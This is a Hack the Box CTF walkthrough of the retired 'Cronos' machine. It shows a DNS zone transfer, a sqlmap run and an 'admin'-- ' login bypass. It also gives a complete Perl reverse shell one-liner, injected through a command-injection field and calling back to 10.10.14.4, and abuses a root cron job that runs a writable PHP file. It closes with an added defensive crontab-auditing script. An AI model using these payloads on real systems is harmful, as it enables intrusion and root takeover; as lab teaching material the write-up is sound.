Hack the Box – Cronos Walkthrough

Today we’re going to solve another CTF machine, “Cronos”. It is now a retired box and is accessible only to VIP members.

Introduction

Specifications

Target OS: Linux
Services: SSH, HTTP, ISC Bind
IP Address: 10.10.10.13
Difficulty: Medium
Weakness

SQL Injection
Cron running as root
Contents

Getting user
Getting root
Reconnaissance
As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning
During this step we identify the target and see which services are listening behind the IP address.

Dig
After spending some time enumerating directories we found nothing, so I thought to do some digging, literally, with dig.

dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 311 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Nov 28 17:22:46 CET 2018
;; XFR size: 7 records (messages 1, bytes 203)
We found admin.cronos.htb, and after adding it to /etc/hosts we found an administrator login page.

Login

We tried brute forcing with different wordlists and usernames, but it didn’t work. Then we gave SQLi a shot and tried SQLMap.

sqlmap -r sqlmap.req --level=5 --risk=3
Inside sqlmap.req we have our POST request.

POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=dnurhq6mp01mvc7thl7t4v56t3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin
It appears that the Username field is vulnerable to SQL injection.

Or we can try different payloads manually; for more information you can read the OWASP SQL injection wiki.

Try admin'-- (with a trailing space after the double dash) as the username and any random password.

Command Injection
Since the input is passed straight to a shell command, we can chain our own command by appending ‘;’ to the end of the input.

Example 6: Command Injection | OWASP Foundation

Let’s get a reverse shell.

Since Perl is installed on the target, we use a Perl reverse shell.

;perl -e 'use Socket;$i="10.10.14.4";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And we got shell.

Privilege Escalation
Now that we have a user shell, we have to escalate privileges to become root. Let’s run some privilege escalation scripts to gather basic information.

Normally I use the LinEnum.sh script, which collects some important information. After doing some research I found that inside the crontab we have a scheduled command which runs a file as root.

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Since cron runs that PHP file as root every minute, we can easily spawn a PHP reverse shell from it and get root.
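The root cause above is a root cron job executing a file that a low-privileged user can modify. As an added defender's check (not part of the walkthrough), the script below parses a system crontab in /etc/crontab layout and flags root jobs whose script carries group or other write bits; the sample job line is constructed to mirror the entry on the box, and demo() builds a temporary file only to exercise the check.

```python
"""Audit a system crontab (/etc/crontab layout, which has a user field) for
root jobs whose script is writable by non-root users. Added example."""
import os
import stat
import tempfile

# Constructed entry mirroring the job found on the box.
SAMPLE_JOB = "* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1"
INTERPRETERS = {"php", "perl", "python", "python3", "sh", "bash", "ruby"}

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip comments, blanks and VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] == "#" or "=" in line.split(None, 1)[0]:
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) == 7:
            yield fields[5], fields[6]

def script_path(command):
    """Absolute path the job executes: first token, or the argument after a known interpreter."""
    tokens = command.split()
    if tokens and os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        tokens = tokens[1:]
    return tokens[0] if tokens and tokens[0].startswith("/") else None

def writable_by_non_root(path):
    """True when group or other hold write permission (owner uid is a further check to add)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_risky_root_jobs(crontab_text):
    """Paths that cron runs as root but which a non-root user could edit."""
    return [p for user, cmd in parse_system_crontab(crontab_text)
            if user == "root" and (p := script_path(cmd)) and writable_by_non_root(p)]

def demo(mode):
    """Create a temp script with `mode`, audit a crontab running it as root,
    and return (flagged paths, script path); the temp file is removed afterwards."""
    fd, path = tempfile.mkstemp(suffix=".php")
    os.close(fd)
    os.chmod(path, mode)
    try:
        return find_risky_root_jobs(f"* * * * * root php {path} >/dev/null\n"), path
    finally:
        os.unlink(path)
```

Run it against a real /etc/crontab and the files in /etc/cron.d; a hit on a world-writable script run as root is the same condition exploited on this box.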